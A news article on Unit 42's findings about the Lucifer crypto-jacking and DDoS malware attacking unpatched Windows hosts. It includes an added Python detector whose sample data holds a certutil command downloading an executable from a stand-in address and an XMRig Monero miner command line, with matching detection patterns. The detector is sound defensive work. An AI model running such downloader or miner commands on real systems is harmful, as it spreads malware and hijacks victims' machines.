Lucifer malware also mines Monero cryptocurrency on infected devices.
Palo Alto Networks’ Unit 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer is capable of launching DDoS attacks and can compromise vulnerable Windows hosts through a variety of flaws the researchers describe as “trivial-to-exploit,” most of which are rated ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer malware. The campaign is still active and wreaking havoc by targeting Windows computers to mine for cryptocurrency and launching intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful: it performs crypto-jacking by dropping XMRig to mine Monero, connects to a C&C server, and self-propagates by exploiting multiple vulnerabilities and brute-forcing credentials.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” said the researchers in a blog post.
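The two behaviours singled out above, certutil being used as a downloader for propagation and an XMRig miner being started, are what a defender would hunt for in process-creation telemetry. The following is an added example, not code from Unit 42 or from the article; the record layout, the constructed sample command lines, the 192.0.2.10 address and the pool hostname are all assumptions.

```python
"""Added example: flag certutil-as-downloader and XMRig-style miner
launches in constructed Windows process-creation records."""
import re

# Constructed sample records: (image name, full command line).
# 192.0.2.10 is a documentation address; the pool host is a placeholder.
SAMPLE_RECORDS = [
    ("certutil.exe",
     "certutil -urlcache -split -f http://192.0.2.10/spread.exe "
     "C:\\Windows\\Temp\\spread.exe"),
    ("certutil.exe", "certutil -hashfile C:\\setup.msi SHA256"),  # benign use
    ("svchost.exe", "svchost.exe -k netsvcs"),
    ("xmrig.exe",
     "xmrig.exe -o pool.example.invalid:3333 --algo rx/0 --coin monero"),
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Command-line fragments typical of an XMRig-style Monero miner.
MINER_ARGS = ("--coin monero", "--algo rx/", "-a rx/", "stratum+tcp://")


def classify(image, cmdline):
    """Return the list of rule names that fire on one record."""
    findings = []
    lc = cmdline.lower()
    # Rule 1: certutil's -urlcache switch together with a URL is the
    # download idiom; legitimate certutil use is certificate work.
    if image.lower() == "certutil.exe" and "-urlcache" in lc and URL_RE.search(cmdline):
        findings.append("certutil_download")
    # Rule 2: miner binary name or miner pool/coin arguments.
    if "xmrig" in image.lower() or any(a in lc for a in MINER_ARGS):
        findings.append("xmrig_miner")
    return findings


def scan(records):
    """Scan all records; return [(image, rule), ...] for every hit."""
    hits = []
    for image, cmdline in records:
        for rule in classify(image, cmdline):
            hits.append((image, rule))
    return hits


if __name__ == "__main__":
    for image, rule in scan(SAMPLE_RECORDS):
        print(f"{rule}: {image}")
```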
NSA exploits in action:
The malware developer named it Satan DDoS, but since Satan Ransomware already exists, Palo Alto researchers chose to name it Lucifer.
The good thing is that patches for the weaponized vulnerabilities are already available, but hosts that have not yet been updated remain vulnerable to crypto-jacking. Researchers urge users to immediately apply the latest patches and updates to secure their devices.